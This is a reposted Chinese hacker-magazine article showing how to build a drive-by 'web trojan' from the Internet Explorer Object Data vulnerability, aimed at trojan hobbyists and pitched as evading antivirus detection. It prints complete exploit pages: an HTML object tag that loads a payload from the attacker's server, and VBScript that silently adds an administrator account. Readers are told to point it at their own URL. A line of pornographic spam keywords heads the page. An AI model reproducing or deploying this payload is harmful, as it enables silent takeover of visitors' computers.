欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

利用IE Object Data漏洞制做全新網(wǎng)頁(yè)木馬(圖)

 更新時(shí)間:2007年01月16日 00:00:00   作者:  

原發(fā)黑客x檔案第8期,版權(quán)歸雜志所有.

利用Internet Explorer Object Data漏洞制做全新網(wǎng)頁(yè)木馬
lcx
今年8月20日,微軟公布了一個(gè)最高嚴(yán)重等級(jí)的重要漏洞--Internet Explorer Object數(shù)據(jù)遠(yuǎn)程執(zhí)行漏洞。這對(duì)于網(wǎng)頁(yè)木馬愛(ài)好者來(lái)說(shuō)可是一件好事,我們可以用這個(gè)漏洞來(lái)制做一款全新的暫時(shí)不會(huì)被查殺的木馬了。在介紹如何制做這個(gè)全新網(wǎng)頁(yè)木馬前我先給大家簡(jiǎn)單介紹一下該漏洞。
一、漏洞描述
該漏洞內(nèi)由eEye Digital Security發(fā)現(xiàn)并于8月20號(hào)公布的,微軟同一天也發(fā)布了相應(yīng)的公告。在eEye的網(wǎng)站公布頁(yè)面:http://www.eeye.com/html/Research/Advisories/AD20030820.html這個(gè)文檔中提到,Microsoft Internet Explorer是一款流行的WEB瀏覽程序,Internet Explorer在處理對(duì)象"Object"標(biāo)記時(shí)沒(méi)有正確處理要被裝載的文件參數(shù)。
"Object"標(biāo)記用于插入ActiveX組件等對(duì)象到HTML頁(yè)面。"Object"標(biāo)記的"Type"屬性用于設(shè)置或獲取對(duì)象的MIME類(lèi)型。通常合法MIME類(lèi)型包括"plain/text"或"application/hta", "audio/x-mpeg"等。Internet Explorer指定遠(yuǎn)程對(duì)象數(shù)據(jù)位置的參數(shù)沒(méi)有充分檢查被裝載的文件屬性,攻擊者可以構(gòu)建惡意頁(yè)面,誘使用戶訪問(wèn)來(lái)運(yùn)行惡意頁(yè)面指定的程序 。Windows 2003 Internet Explorer由于使用了"Enhanced Security Configuration Mode"模式,默認(rèn)是使用 了"Disable ActiveX",因此此漏洞在Windows 2003 IE級(jí)別為中等。
這段描述很專(zhuān)業(yè),不過(guò)看不懂的菜鳥(niǎo)可以跳過(guò),直接學(xué)制做方法。:-)
二、受影響的系統(tǒng)版本
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.5SP2
Microsoft Internet Explorer 5.5SP1
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.0.1SP3
Microsoft Internet Explorer 5.0.1SP2
Microsoft Internet Explorer 5.0.1SP1
Microsoft Internet Explorer 6.0SP1
- Microsoft Windows XP
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2003 Web Edition
- Microsoft Windows 2003 Standard Edition
- Microsoft Windows 2003 Enterprise Edition 64-bit
- Microsoft Windows 2003 Enterprise Edition
- Microsoft Windows 2003 Datacenter Edition 64-bit
- Microsoft Windows 2003 Datacenter Edition
- Microsoft Windows 2000
三、漏洞利用詳細(xì)方法
根據(jù)http://www.eeye.com/html/Research/Advisories/AD20030820.html這個(gè)頁(yè)面的提示,我寫(xiě)出了兩個(gè)簡(jiǎn)單的測(cè)試頁(yè)面。請(qǐng)先看代碼和注釋?zhuān)以賮?lái)講解一下。

--------------test.htm代碼開(kāi)始-----------------
<html>
<body>
這是個(gè)測(cè)試頁(yè),如果你的系統(tǒng)是w2k或xp,訪問(wèn)后將會(huì)增加一個(gè)用戶名是lcx密碼是lcxlcx的管理用戶
<object data="http://127.0.0.1/test.test"></object>
<!--這就是來(lái)調(diào)用一個(gè)惡意頁(yè)面了test.test,我是在本機(jī)測(cè)試的,放在我的iis管理器根目錄下,所以u(píng)rl是http://127.0.0.1;如果你要用這段代碼,請(qǐng)更改相應(yīng)的網(wǎng)test.test的url地址,將http://127.0.0.1/test.test改成http://你的url/test.test--!>
</body>
------------test.htm代碼結(jié)束--------------

--------------test.htm中寫(xiě)到的test.test代碼開(kāi)始------------------
<html>
<object id=wsh classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B></object>
<script language=vbscript>
set wshshell=createobject ("wscript.shell" )
a=wshshell.run ("cmd.exe /c net user lcx lcxlcx /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators lcx /add",0)
'這是加一個(gè)用戶是lcx密碼是lcxlcx的管理用戶,這段vbs你應(yīng)當(dāng)會(huì)看懂
</script>
</html>
------------test.test代碼結(jié)束---------------

相關(guān)文章

最新評(píng)論